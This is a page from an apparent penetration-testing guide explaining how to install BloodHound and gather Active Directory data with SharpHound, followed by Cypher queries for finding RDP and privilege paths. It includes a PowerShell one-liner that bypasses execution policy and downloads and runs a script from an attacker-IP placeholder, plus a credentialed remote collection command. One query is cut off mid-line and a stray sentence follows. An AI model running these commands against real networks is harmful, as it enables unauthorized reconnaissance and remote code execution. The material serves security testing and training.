The Pentesting Guide
TwitterBlog
  • The Pentesting Guide
  • ℹ️0 - Pre-Engagement
  • 🔍1 - Information Gathering
  • Passive (OSINT)
  • Active
    • 🕵️HUMINT
    • WIFI
    • IP & Port Scanning
    • Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 53 - DNS
      • 80,443 - WEB
      • 88 - Kerberos
      • 110 - POP3
      • 111 - rpcbind
      • 161 - SNMP
      • 389 - LDAP
      • 139,445 - SMB
      • Active Directory
  • 💣2 - Exploitation
  • Brute Forcing
  • WEB
    • Apache Tomcat
    • Authentication
    • Broken Access Control
    • Cache poisoning
    • Clickjacking
    • CORS
    • CSRF
    • File Inclusion
    • Host Header Injection
    • HTTP Request Smuggling
    • Information disclosure
    • JWT
    • OS command injection
    • PHP deserialisation
    • SQLi
    • SSRF
    • SSTI
    • Shellshock
    • Unrestricted File Upload
    • XSS
    • XXE
  • Web (OWASP Test cases)
    • 4.1 Information Gathering
    • 4.2 Configuration and Deployment Management Testing
    • 4.3 Identity Management Testing
    • 4.4 Authentication Testing
    • 4.5 Authorization Testing
    • 4.6 Session Management Testing
    • 4.7 Input Validation Testing
    • 4.8 Testing for Error Handling
    • 4.9 Testing for Weak Cryptography
    • 4.10 Business Logic Testing
    • 4.11 Client-side Testing
    • 4.12 API Testing
  • WIFI
  • HUMINT
    • 🎣Gophish (Phishing)
    • Malicious Phishing Files
    • Phishing Evaluation
  • BoF - Windows(x86)
  • Active Directory
    • Kerberos
    • GPOs
    • Certificates
    • LAPS
    • Domain Trusts
  • 👿3 - Post Exploitation
  • File transfer
  • Shells
  • Situational Awareness
    • Containers and VMs
    • Linux
    • Windows
      • Dumping Credentials
      • Countermeasure Evasion
    • Active Directory
      • BloodHound & SharpHound
  • General
    • Linux
    • Windows
  • Local Privilege Escalation
    • Linux
    • Windows
  • Persistance
    • Windows
  • Cracking
  • Pivoting
    • Tunnelling & Port Forwarding
  • Lateral Movement
  • WIFI
  • 📓4 - Report
  • 🧹5 - House cleaning
Powered by GitBook
On this page
  • Introduction
  • Installation & Configuration
  • Data gathering
  • Local
  • Remote
  • BloodHound queries
  1. Situational Awareness
  2. Active Directory

BloodHound & SharpHound

Last updated 1 month ago

Introduction

 is a graphic interface tool that allows you to map the AD environment visually. An attacker can use BloodHound to quickly identify highly complex attack paths that would otherwise be impossible.

However, prior to any data visualisation, it is required to use , the official data collector for BloodHound, to detect what domain your current user belongs to, find a domain controller for that domain and gather data like:

  • Security group memberships

  • Domain trusts

  • Abusable rights on Active Directory objects

  • Group Policy links

  • OU tree structure

  • Several properties from computer, group and user objects

  • SQL admin links

Installation & Configuration

In order to install BloodHound on your Kali machine execute the following steps.

1. Install bloodhound & neo4j

sudo apt install bloodhound neo4j -y

2. Configure neo4j database: Execute sudo neo4j console, access to with neo4j default credentials "neo4j:neo4j" and change the default password.

3. Execute sudo bloodhound and log in with the new set of credentials.

Data gathering

There are two ways to obtain the required data to populate BloodHound.

Local

powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/SharpHound.ps1'); Invoke-Bloodhound -CollectionMethod All [-Domain <DOMAIN>] [-OutputDirectory <OUTPUT_DIR>] -ZipFileName loot.zip "

Remote

pip3 install bloodhound
bloodhound-python -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -ns <NAMESERVER_IP> -d <DOMAIN> -c All

Finally, drag and drop the generated files into the BloodHound interface for ingestion, playing with the default queries.

BloodHound queries

  • Find workstations a user can RDP into.

match p=(g:Group)-[:CanRDP]->(c:Computer) where g.objectid ENDS WITH '-513' AND NOT c.operatingsystem CONTAINS 'Server' return p
  • Find servers a user can RDP into.

match p=(g:Group)-[:CanRDP]->(c:Computer) where g.objectid ENDS WITH '-513'
  • Find what groups can RDP

MATCH p=(m:Group)-[r:CanRDP]->(n:Computer) RETURN m.name, n.name ORDER BY m.name
  • Find all the privileges (edges) of the domain users against the domain computers (e.g. CanRDP, AdminTo etc. HasSession edge is not included):

MATCH p1=shortestPath(((u1:User)-[r1:MemberOf*1..]->(g1:Group))) MATCH p2=(u1)-[*1]->(

and execute SharpHound. Then, transfer the *_loop.zip files into your machine.

BloodHound
SharpHound
http://localhost:7474/
Download